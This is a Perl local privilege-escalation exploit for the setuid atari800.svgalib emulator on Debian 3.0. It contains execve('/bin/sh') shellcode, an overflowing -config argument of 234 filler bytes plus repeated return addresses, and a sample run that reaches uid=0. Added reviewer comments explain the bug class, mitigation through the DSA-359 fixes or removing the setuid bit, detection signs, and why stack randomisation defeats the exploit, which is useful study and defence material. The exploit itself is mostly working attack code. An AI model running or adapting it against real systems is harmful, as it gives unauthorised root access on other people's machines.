#!/usr/bin/perl
######################################################
# Priv8security.com atari800 local root exploit.
#
# Tested against Debian 3.0
# Based on http://www.debian.org/security/2003/dsa-359
#
# wsxz@debian:~$ perl priv8atari800.pl
# Priv8security.com atari800.svgalib local r00t exploit!!
# usage: priv8atari800.pl offset
# Using address: 0xbfffffb9
# User config file
# 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA...
# Aÿÿ¿¹ÿÿ¿¹ÿÿ¿¹ÿÿ¿¹ÿÿ¿¹ÿÿ¿' not found.
# sh-2.05b# id
# uid=0(root) gid=0(root) groups=1001(wsxz)
#
#####################################################
#
# Reviewer notes (added):
#   * Bug class: an over-long value for the -config option overruns a buffer in
#     /usr/bin/atari800.svgalib. The "User config file '...' not found." line in
#     the sample run shows the argument being handled as a file name.
#   * Impact: the sample run goes from user wsxz to uid=0, which implies the
#     target binary is installed setuid root -- NOTE(review): confirm against
#     the DSA-359 advisory linked above.
#   * Mitigation: install the fixed packages named in DSA-359, or clear the
#     setuid bit on the binary where the emulator is not needed with
#     privileges.
#   * Detection: exec logging that shows this binary started with a -config
#     argument of roughly 250+ bytes containing non-printable bytes, together
#     with an environment variable holding binary data.
#   * The script has no `use strict` / `use warnings`; every variable below is
#     a package global.

# i386 Linux machine code as a byte string; each \xcd\x80 is an `int 0x80`
# system-call trap. The first two rows are labelled setuid 0 / setgid 0 by the
# author. The last two rows embed the ASCII text "//bin/sh" and end in a third
# trap -- presumably an execve of the shell, consistent with the sh-2.05b#
# prompt in the sample run.
$shellcode = "\x31\xc0\x31\xdb\xb0\x17\xcd\x80".#setuid 0
             "\x31\xdb\x89\xd8\xb0\x2e\xcd\x80".#setgid 0
             "\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69".
             "\x89\xe3\x52\x53\x89\xe1\x8d\x42\x0b\xcd\x80";

# Absolute path of the target; its length also feeds the address guess below.
$path = "/usr/bin/atari800.svgalib";

# $retaddr = 0xbffffb90;
# The address is derived from a hard-coded constant minus the lengths of the
# payload and the program path, so it only holds where the stack top is fixed.
# NOTE(review): stack address randomisation invalidates this guess, and a
# non-executable stack blocks execution of bytes stored in the environment.
$retaddr = 0xbffffffa - length($shellcode) - length($path);

# The second assignment overwrites the default set on the line before it. With
# no command-line argument $offset is undef, which counts as 0 in the numeric
# additions below.
$offset = 0;
$offset = $ARGV[0];

# Banner. The usage line is printed unconditionally, not only on bad arguments.
print " Priv8security.com atari800.svgalib local r00t exploit!!\n";
print " usage: $0 offset\n";
print " Using address: 0x", sprintf('%lx',($retaddr + $offset)), "\n";

# pack('l', ...) yields the address as a 32-bit value in native byte order.
$newret = pack('l', ($retaddr + $offset));

# 234 filler bytes followed by six copies of the packed address: 258 bytes in
# total, which become the -config value.
$buffer = "A" x 234;
$buffer .= $newret x 6;

# The machine code reaches the target process through the environment variable
# WSXZ, not through the command line.
local($ENV{'WSXZ'}) = $shellcode;

# Single-string exec: Perl passes the command to /bin/sh -c when the string
# contains shell metacharacters, so the raw bytes in $buffer are not guaranteed
# to reach the target unmodified. exec replaces this process and does not
# return on success; a failed exec is not checked.
exec("$path -config $buffer");